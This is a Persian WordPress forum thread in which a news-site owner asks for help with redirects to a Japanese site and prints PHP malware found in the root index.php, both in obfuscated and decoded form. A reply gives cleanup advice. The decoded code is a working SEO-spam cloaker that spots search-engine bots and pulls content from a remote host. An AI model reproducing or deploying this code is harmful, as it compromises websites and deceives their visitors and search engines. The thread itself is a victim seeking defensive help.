انجمن


ورود کد مخرب به وردپرس  (۲ نوشته)

  • N3MiSiS

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱
    تشکر شده: ۱ بار
    # نوشته شده: ۲ ماه پیش
    ۳۰ آذر ۱۳۹۵ - ۱۷:۲۹

    سلام به همه دوستان :

    سایت من asanews.ir هست و یه سایت خبریه. اما بعضی وقتا که سایت رو باز میکنم یه سایت ژاپنی رو باز میکنه. مخصوصا مواقعی که vpn باز هست. این باعث شده که وقتی توو گوگل آسانیوز میزنم محتوای ژاپنی نشون میده یا توو برنامه تلگرام.

    من کلی گشتم و تنها کد مشکوکی که پیدا کردم کد زیر بود. که از وقتی پاک کردم خیلی درست شده. اما بازم بعضا پیش میاد. و اینکه هر روز دوباره اوون کد رو توو فایل index.php وردپرس مینویسه.

    کد زیر در فایل index.php روت وردپرس :

    <?php
    header("Content-type: text/html; charset=utf-8");
    @set_time_limit(0);
    $xmlname = 'mapss.xml';
    $jdir = '';
    $smuri = smrequest_uri();
    if($smuri==''){
        $smuri='/';
    }
    $smuri = base64_encode($smuri);
    $dt = 0;
    function smrequest_uri(){
        if (isset($_SERVER['REQUEST_URI'])){
            $smuri = $_SERVER['REQUEST_URI'];
        }else{
            if(isset($_SERVER['argv'])){
                $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
            }else{
                $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
            }
        }
        return $smuri;
    }
    
    $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
    
    ?>

    من این کد رو رمز گشایی کردم به این کد رسیدم :

    ?>'; exit; } if($site){ if($site == 'xml'){ $web = 'http://'.$goweb.'/sitemap.php?date='.$id.'&temp='.$temp.'&web='.$host.'&xml='.$dt.'&h='.$h; if(substr($temp,0,8)=='shellxml'){ $xmlname = substr($temp,8).'.xml'; } if(substr($temp,0,7)=='hackxml'){ if(substr($temp,7)){ $xmlname = substr($temp,7).'.xml'; } } $xml = trim(smoutdo($web)); $myfile = fopen($xmlname, "w"); fwrite($myfile, $xml); fclose($myfile); echo "ok
    http://".$_SERVER'HTTP_HOST'."/".$xmlname; echo "
    ".$web; exit(); } if($id){ $web = 'http://'.$goweb.'/index.php?url='.$site.'&id='.$id.'&temp='.$temp.'&dt='.$dt.'&web='.$host.'&zz='.smisbot().'&jdir='.$jdir.'&clock='.$clock.'&uri='.$smuri.'&lang='.$lang.'&os='.$os.'&urlshang='.$urlshang.'&http_clock='.$http_clock; echo trim(smoutdo($web)); exit(); } }else{ $web = 'http://'.$goweb.'/index.php?url=bot&id='.$id.'&temp='.$temp.'&dt='.$dt.'&web='.$host.'&zz='.smisbot().'&jdir='.$jdir.'&clock='.$clock.'&uri='.$smuri.'&lang='.$lang.'&os='.$os.'&urlshang='.$urlshang.'&http_clock='.$http_clock; if(!strstr(smoutdo($web),'nobotuseragent')){ echo trim(smoutdo($web)); exit(); } } function smisbot() { $agent = strtolower($_SERVER['HTTP_USER_AGENT']); if ($agent != "") { $spiderSite = array ("TencentTraveler","Googlebot","msnbot","Sosospider+","Sogou web spider","ia_archiver","Yahoo! Slurp","YoudaoBot","Yahoo Slurp","MSNBot","Java (Often spam bot)","BaiDuSpider","Voila","Yandex bot","BSpider","twiceler","Sogou Spider","Speedy Spider","Google AdSense","Heritrix","Python-urllib","Alexa (IA Archiver)","Ask","Exabot","Custo","OutfoxBot/YodaoBot","yacy","SurveyBot","legs","lwp-trivial","Nutch","StackRambler","The web archive (IA Archiver)","Perl tool","MJ12bot","Netcraft","MSIECrawler","WGet tools","larbin","Fish search", 'bingbot','google', 'baidu', 'aol', 'bing', 'yahoo'); foreach ($spiderSite as $val) { $str = strtolower($val); if (strpos($agent, $str)) { return true; } } }else{ return false; } } function smoutdo($url){ $file_contents = @file_get_contents($url); if (!$file_contents) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $file_contents = curl_exec($ch); curl_close($ch); } return $file_contents; } ?>

    و اون سایتی که بجای سایت من باز میشه این سایت ژاپنیه که اونم از وردپرس استفاده میکنه :

    futago-life.com

    همه افزونه ها رو هم غیر فعال کردم. بازم درست نشد

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    سلامت
  • طراحی قالب وردپرس

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۴
    تشکر شده: ۵ بار
    # نوشته شده: ۲ ماه پیش
    ۲ دی ۱۳۹۵ - ۱۷:۱۴

    سلام
    به احتمال زیاد سایت شما هک شده و شل تو سایتتون زده شده.
    منم همین مشکل رو داشتم برای یکی از مشتریانم.
    باید در مرحله اول شل هایی که زده شده رو حذف کنید.
    کل فایل های موجود تو هاستتون رو دانلود کنید و با یه آنتی ویروس آپدیت اسکن کنید. من خودم با Eset 9 تست کردم جواب داد.
    فایل هایی که توشون شل زده شده رو پیدا میکنه. هر فایلی که مخرب بود رو باید با نسخه ی اصلیش جایگزین کنید.
    دقت کنید اگه فایل های wp-admin یا wp-include یا root تخریب شده بود پیشنهاد میکنم آپدیت آفلاین انجام بدید. فایل های تو wp-content رو هم با نسخه اصلی جایگزین کنید تا فایل های تخریب شده کاملا حذف بشن.
    بعد از انجام این کار تو هاست آپلود و کلیه دسترسی های هاست و وردپرس و FTP رو تغییر بدید.
    موفق باشید

درباره‌ی این موضوع



برچسب‌ها

هیچ برچسبی نیست.